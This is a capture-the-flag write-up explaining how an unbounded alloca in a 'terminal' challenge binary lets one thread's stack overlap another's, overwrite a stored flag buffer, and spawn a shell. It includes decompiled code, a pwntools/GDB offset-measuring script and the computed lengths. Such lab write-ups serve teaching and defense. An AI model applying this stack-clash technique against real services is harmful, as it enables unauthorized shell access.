pwn/squ1rrel-logon

We are provided with a terminal binary that serves as an authenticated gateway to a command-line shell on the target server.

The main function spawns two threads, userinfo and auth:

c
int __fastcall main(int argc, const char **argv, const char **envp)
{
  setbuf(stdout, 0LL);
  setbuf(stdin, 0LL);
  print_banner();
  pthread_create(&userinfo_thread, 0LL, userinfo, 0LL);
  pthread_create(&auth_thread, 0LL, auth, 0LL);
  pthread_join(auth_thread, 0LL);
  return 0;
}

Note that the auth thread is spawned after the userinfo thread. This will be important in a moment.

alloca

Let's have a look at the userinfo thread:

c
void *__fastcall userinfo(void *a1)
{
  void *v1; // rsp
  void *v2; // rsp
  _QWORD v4[2]; // [rsp+0h] [rbp-30h] BYREF
  unsigned __int64 sname_len; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 fname_len; // [rsp+18h] [rbp-18h] BYREF
  const char *v7; // [rsp+20h] [rbp-10h]
  const char *v8; // [rsp+28h] [rbp-8h]

  v4[1] = a1;
  puts("\x1B[1;36m[AUTH] User identification required\x1B[0m");
  printf("First Name Length: ");
  __isoc99_scanf("%ld%*c", &fname_len);
  printf("Surname Length: ");
  __isoc99_scanf("%ld%*c", &sname_len);
  if ( fname_len > 0x100000000LL || sname_len > 0x100000000LL )
  {
    puts("Too long for our systems.");
    exit(1);
  }
  v1 = alloca(16 * ((fname_len + 23) / 0x10));
  v8 = (const char *)v4;
  v2 = alloca(16 * ((sname_len + 23) / 0x10));
  v7 = (const char *)v4;
  printf("First Name: ");
  readline(v8, fname_len);
  printf("Surname: ");
  readline(v7, sname_len);
  printf("Authenticating Employee %s %s\n", v8, v7);
  return 0LL;
}

Looks fairly normal, except for the call to alloca. The alloca function is similar to the malloc function in that it dynamically allocates memory. However, unlike malloc, it allocates memory on the stack instead of the heap.

We can see how this works by inspecting the assembly:

asm
mov     rax, [rbp+fname_len]
lea     rdx, [rax+8]
mov     eax, 10h
sub     rax, 1
add     rax, rdx
mov     ecx, 10h
mov     edx, 0
div     rcx
imul    rax, 10h
sub     rsp, rax

After doing some math to round fname_len + 8 up to a multiple of 16, i.e. 16 * ((fname_len + 23) / 16), it simply does a sub rsp, rax.

Recall that the stack grows from higher addresses to lower addresses, so a sub rsp, rax will allocate space on the stack. This space will automatically be deallocated when the function exits as the stack frame is cleaned up.
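To make the arithmetic concrete, here is a minimal Python sketch of what the assembly computes. The helper names alloca_size and rsp_after_alloca are made up for illustration, and the rsp value used at the end is an arbitrary example, not one taken from the binary.

```python
def alloca_size(n: int) -> int:
    """Bytes subtracted from rsp for a requested length of n bytes.

    Mirrors the assembly: (n + 8 + 15) is divided by 16 with integer
    division (like `div rcx`) and then multiplied by 16 again.
    """
    return 16 * ((n + 8 + 15) // 16)


def rsp_after_alloca(rsp: int, n: int) -> int:
    """The stack grows downwards, so allocating is a subtraction."""
    return rsp - alloca_size(n)


if __name__ == "__main__":
    for n in (0, 8, 9, 10, 5000):
        print(n, alloca_size(n))
    # Arbitrary example value for rsp, only to show the subtraction.
    print(hex(rsp_after_alloca(0x7FFFF7C00E00, 10)))
```

Note that nothing in this computation looks at where the stack actually ends.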

However, notice that almost no checks are conducted to determine that we have sufficient stack space to accommodate the allocation. There is a check that fname_len is not more than 0x100000000 bytes, but this is still a very generous limit (4GiB). We probably don't have 4GiB of stack space to allocate!

So, what happens if we alloca more memory than we actually have? This will depend on the memory layout of the process. Let's have a look with vmmap in GDB:

[Screenshot: vmmap output in GDB showing the thread stacks]

Our current thread, userinfo, is thread 2. Our stack space spans from 0x00007ffff7401000 to 0x00007ffff7c01000 (stack-th2).

Interestingly, the auth thread's stack (stack-th3) is at a lower address than ours, spanning 0x00007ffff6a01000 to 0x00007ffff7201000. This is because the stack space for auth was allocated after that of userinfo.

This means that if we allocate a sufficiently large buffer, we can make rsp point into the stack space of the auth thread! We can then write a first name of our choice into the stack memory of auth.
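As a rough sanity check, the addresses quoted from vmmap can be plugged into a short calculation. This sketch only does arithmetic on those ranges. The variable names are illustrative, and the rsp used in the example is a hypothetical value near the top of userinfo's stack.

```python
# Mapped ranges quoted from vmmap (start inclusive, end exclusive).
USERINFO_STACK = (0x00007FFFF7401000, 0x00007FFFF7C01000)  # stack-th2
AUTH_STACK = (0x00007FFFF6A01000, 0x00007FFFF7201000)      # stack-th3
MAX_LEN = 0x100000000  # largest length the binary accepts

userinfo_size = USERINFO_STACK[1] - USERINFO_STACK[0]
auth_size = AUTH_STACK[1] - AUTH_STACK[0]
gap = USERINFO_STACK[0] - AUTH_STACK[1]


def lands_in_auth(rsp: int, size: int) -> bool:
    """True if rsp - size falls inside the auth thread's stack."""
    return AUTH_STACK[0] <= rsp - size < AUTH_STACK[1]


if __name__ == "__main__":
    mib = 1 << 20
    print("userinfo stack:", userinfo_size // mib, "MiB")
    print("auth stack:", auth_size // mib, "MiB")
    print("gap between them:", gap // mib, "MiB")
    print("stacks that fit into MAX_LEN:", MAX_LEN // userinfo_size)
    # Hypothetical rsp close to the top of userinfo's stack.
    rsp = USERINFO_STACK[1] - 0x200
    print(lands_in_auth(rsp, 32), lands_in_auth(rsp, 10 * mib))
```

With 8 MiB per stack and a 2 MiB gap, an allocation of around 10 MiB is already enough to move rsp out of our own stack and into the one below it.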

But what should we target in the auth thread?

auth

Let's have a look at the auth function:

c
void *__fastcall auth(void *a1)
{
  char s1[256]; // [rsp+10h] [rbp-210h] BYREF
  char buf[264]; // [rsp+110h] [rbp-110h] BYREF
  int v4; // [rsp+218h] [rbp-8h]
  int fd; // [rsp+21Ch] [rbp-4h]

  fd = open("flag.txt", 0);
  if ( fd < 0 )
  {
    puts("Error initializing authentication. Please contact support if on remote.");
    exit(1);
  }
  v4 = read(fd, buf, 0x100uLL);
  buf[v4 - 1] = 0;
  close(fd);
  pthread_join(userinfo_thread, 0LL);
  printf("\x1B[1;36m[SYSTEM] Enter security token: \x1B[0m");
  readline(s1, 256LL);
  if ( !strcmp(s1, buf) )
  {
    puts("\x1B[1;32m[ACCESS GRANTED] Welcome to the system\x1B[0m");
    system("/bin/sh");
  }
  else
  {
    puts("\x1B[1;31m[ACCESS DENIED] Invalid security token\x1B[0m");
    puts("\x1B[1;31m[SYSTEM] Session terminated\x1B[0m");
  }
  return 0LL;
}

The key functionality of the auth function is verifying that the user knows the flag, which is stored on the stack in the buf variable. Since we do not know the flag, it is impossible to pass this check without cheating.

However, now that we can overwrite stack memory in auth, all we need to do is overwrite buf with a value we know, then enter that value as the security token to get a shell and read the flag.
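The idea can be modelled with a small simulation of auth's stack frame. The offsets come from the decompiler comments (s1 at rsp+0x10, buf at rsp+0x110). The strings, the helper names, and the assumption that readline NUL-terminates what it stores are mine, so treat this as a sketch rather than a description of the real binary.

```python
FRAME_SIZE = 0x220  # distance from rsp to rbp in auth (s1 is at rbp-0x210)
S1_OFF = 0x10       # char s1[256]  at [rsp+10h]
BUF_OFF = 0x110     # char buf[264] at [rsp+110h]


def c_string(mem: bytearray, off: int) -> bytes:
    """Read a NUL-terminated string starting at offset off."""
    end = mem.index(0, off)
    return bytes(mem[off:end])


def write_c_string(mem: bytearray, off: int, data: bytes) -> None:
    """Store data followed by a terminating NUL byte (assumed behaviour)."""
    mem[off:off + len(data) + 1] = data + b"\x00"


frame = bytearray(FRAME_SIZE)
# auth reads the flag into buf before joining userinfo (placeholder value).
write_c_string(frame, BUF_OFF, b"placeholder-flag")
# userinfo's first name lands on top of buf.
write_c_string(frame, BUF_OFF, b"known-token")
# The same value is then typed at the security token prompt.
write_c_string(frame, S1_OFF, b"known-token")

# Equivalent of !strcmp(s1, buf)
granted = c_string(frame, S1_OFF) == c_string(frame, BUF_OFF)

if __name__ == "__main__":
    print("access granted:", granted)
```

The leftover bytes of the old flag after the new terminator do not matter, since the comparison stops at the first NUL.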

The only obstacle now is to determine the amount of memory to allocate so that rsp falls exactly at the start of buf.

To do this, I wrote a simple script to print the value of rsp after the allocation of the buffer for the first name, and the address of buf. We can then subtract these two values to determine the offset required:

python
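from pwn import *

e = ELF("terminal")
context.binary = e


def setup():
    p = process()
    # p = remote("")
    return p


if __name__ == '__main__':
    p = setup()
    # Break after the first-name alloca in userinfo (0x401484) and at the
    # point in auth where rsi holds the address of buf (0x4015fb).
    _, g = gdb.attach(p, "break *0x401484\nbreak *0x4015fb\nc", api=True)
    # Small lengths, so both buffers stay on userinfo's own stack.
    p.sendlineafter(b"Length:", b"10")
    p.sendlineafter(b"Length:", b"10")
    g.wait()
    # rsp right after the buffer for the first name has been allocated
    print(g.execute("p $rsp\nc", to_string=True))
    p.sendlineafter(b"ame:", b"A\n")
    p.sendlineafter(b"ame:", b"B\n")
    p.sendlineafter(b"token", b"A\n")
    g.wait()
    # Address of buf in auth
    print(g.execute("p $rsi\nc", to_string=True))

    p.interactive()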

Running this script prints something like:

$1 = (void *) 0x7f5ae9fffe80

$3 = 0x7f5ae95ffdc0

The difference between these values is 10485952 bytes. Since rsp was measured with fname_len set to 10, we need to increase fname_len by that amount, to 10485952 + 10 = 10485962.
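The calculation can be double-checked with a few lines of Python. This sketch assumes that the printed rsp is the value right after the sub rsp, rax for the first name, and that the distance between the two stacks is the same from run to run. The helper alloca_size simply repeats the rounding from the assembly.

```python
def alloca_size(n: int) -> int:
    """Bytes subtracted from rsp for a length of n (rounding from the asm)."""
    return 16 * ((n + 23) // 16)


RSP_AFTER_ALLOCA = 0x7F5AE9FFFE80  # "p $rsp", measured with fname_len = 10
BUF_ADDR = 0x7F5AE95FFDC0          # "p $rsi", the address of buf
PROBE_LEN = 10

offset = RSP_AFTER_ALLOCA - BUF_ADDR
fname_len = offset + PROBE_LEN

# Undo the probe allocation, then apply the real one.
rsp_before = RSP_AFTER_ALLOCA + alloca_size(PROBE_LEN)
new_rsp = rsp_before - alloca_size(fname_len)

# Because of the rounding, a small window of lengths gives the same rsp.
valid = [n for n in range(fname_len - 16, fname_len + 32)
         if rsp_before - alloca_size(n) == BUF_ADDR]

if __name__ == "__main__":
    print(offset, fname_len, hex(new_rsp))
    print(valid[0], valid[-1])
```

Under these assumptions, new_rsp comes out equal to the address of buf, and any length in the printed window would work equally well.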

Unfortunately, if we use this fname_len as is, the program crashes with a segfault.

[Screenshot: the program crashing with a segfault]

This is due to the stack space used by the following call in userinfo:

c
printf("Authenticating Employee %s %s\n", v8, v7);

As rsp now points into the stack memory of auth, any further stack usage by userinfo (such as the frames of printf and the functions it calls) overwrites critical values stored on auth's stack, for example saved return addresses, resulting in a subsequent crash.

To solve this problem, we can set the surname length to a large value, such as 5000. The surname buffer is allocated with a second alloca, so this moves rsp roughly another 5000 bytes down. This ensures that rsp is far away from any critical parts of auth's memory when the printf call uses stack memory.
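To get a feel for the numbers, the sketch below compares where rsp ends up for a surname length of 10 and of 5000. It assumes that rsp sits exactly at buf after the first alloca, and uses the decompiler's offset of buf within auth's frame (rsp+0x110). The function names are illustrative.

```python
def alloca_size(n: int) -> int:
    """Bytes subtracted from rsp for a length of n (rounding from the asm)."""
    return 16 * ((n + 23) // 16)


BUF_OFF_IN_AUTH = 0x110  # buf is at [rsp+110h] in auth's frame


def distance_below_auth_rsp(sname_len: int) -> int:
    """How far userinfo's rsp ends up below auth's own rsp.

    Negative means rsp is still inside auth's frame (between s1 and buf).
    Assumes rsp was exactly at buf before the surname alloca.
    """
    return alloca_size(sname_len) - BUF_OFF_IN_AUTH


if __name__ == "__main__":
    for sname_len in (10, 5000):
        print(sname_len, alloca_size(sname_len),
              distance_below_auth_rsp(sname_len))
```

With a length of 10, rsp is still inside auth's frame, so anything printf pushes goes straight through s1 and whatever lies below it. With 5000, it starts several kilobytes further down. Whether that is enough to clear everything auth still needs is not something this arithmetic shows. It simply worked in practice.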

With this fix, we are successful in obtaining a shell locally:

[Screenshot: shell obtained locally]

However, the same exploit does not work on the server 🤔

[Screenshot: the exploit failing on the server]

Debugging

Perplexed, I sent my script and exploit to a teammate for some suggestions. To my surprise, the output of the script on his system was:

$1 = (void *) 0x7f68450aedb0

$2 = 0x7f68448adcea

The difference was 8392902, much smaller than the expected 10485952 calculated on my system.

On his system, the correct fname_len should thus have been 8392912 instead of 10485962.

A vmmap explains this discrepancy:

[Screenshot: vmmap output on the teammate's system]

On this system, there is no space between the end of the stack space for the auth thread and the start of the next mapped page. However, on my system, there is an unmapped region of roughly 2 MiB there (0x00007ffff7201000 to 0x00007ffff7401000 in the earlier vmmap), resulting in a larger offset. This difference is probably a result of different kernel versions handling the allocation of pages slightly differently.
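The numbers line up reasonably well with this explanation. The sketch below recomputes both offsets from the printed addresses and compares their difference with the gap between the two stacks in my vmmap output. It is only arithmetic on values quoted in this write-up.

```python
# Offsets measured by the script on the two systems.
MINE = 0x7F5AE9FFFE80 - 0x7F5AE95FFDC0
TEAMMATE = 0x7F68450AEDB0 - 0x7F68448ADCEA

# Gap between stack-th3 and stack-th2 in my vmmap output.
GAP_ON_MY_SYSTEM = 0x00007FFFF7401000 - 0x00007FFFF7201000

delta = MINE - TEAMMATE

if __name__ == "__main__":
    print("my offset:", MINE)
    print("teammate's offset:", TEAMMATE)
    print("difference:", delta)
    print("gap on my system:", GAP_ON_MY_SYSTEM)
    print("unexplained remainder:", GAP_ON_MY_SYSTEM - delta)
```

The two offsets differ by just under 2 MiB, which is close to the size of the gap. The remaining few kilobytes are not accounted for by this comparison.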

After replacing the fname_len with the newly calculated 8392912, the exploit works as expected:

[Screenshot: the exploit working with the new fname_len]
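For reference, the full input sequence can be sketched as a single byte string. The helper build_input and the token value are hypothetical, and the sketch assumes that readline stops at a newline and NUL-terminates what it stores. In a real exploit, each answer would be sent after its prompt (for example with pwntools' sendlineafter) rather than all at once.

```python
def build_input(fname_len: int, sname_len: int, token: bytes,
                surname: bytes = b"B") -> bytes:
    """Answers to the prompts, in order, one per line.

    The first name doubles as the new contents of buf, so the same
    token is sent again at the security token prompt.
    """
    lines = [
        str(fname_len).encode(),  # First Name Length
        str(sname_len).encode(),  # Surname Length
        token,                    # First Name, written over buf
        surname,                  # Surname
        token,                    # Security token, compared against buf
    ]
    return b"\n".join(lines) + b"\n"


if __name__ == "__main__":
    # Lengths taken from the write-up; the token is an arbitrary example.
    print(build_input(8392912, 5000, b"known-token"))
```

The fname_len has to be re-measured for each target environment, as the offset between the two stacks is not the same everywhere.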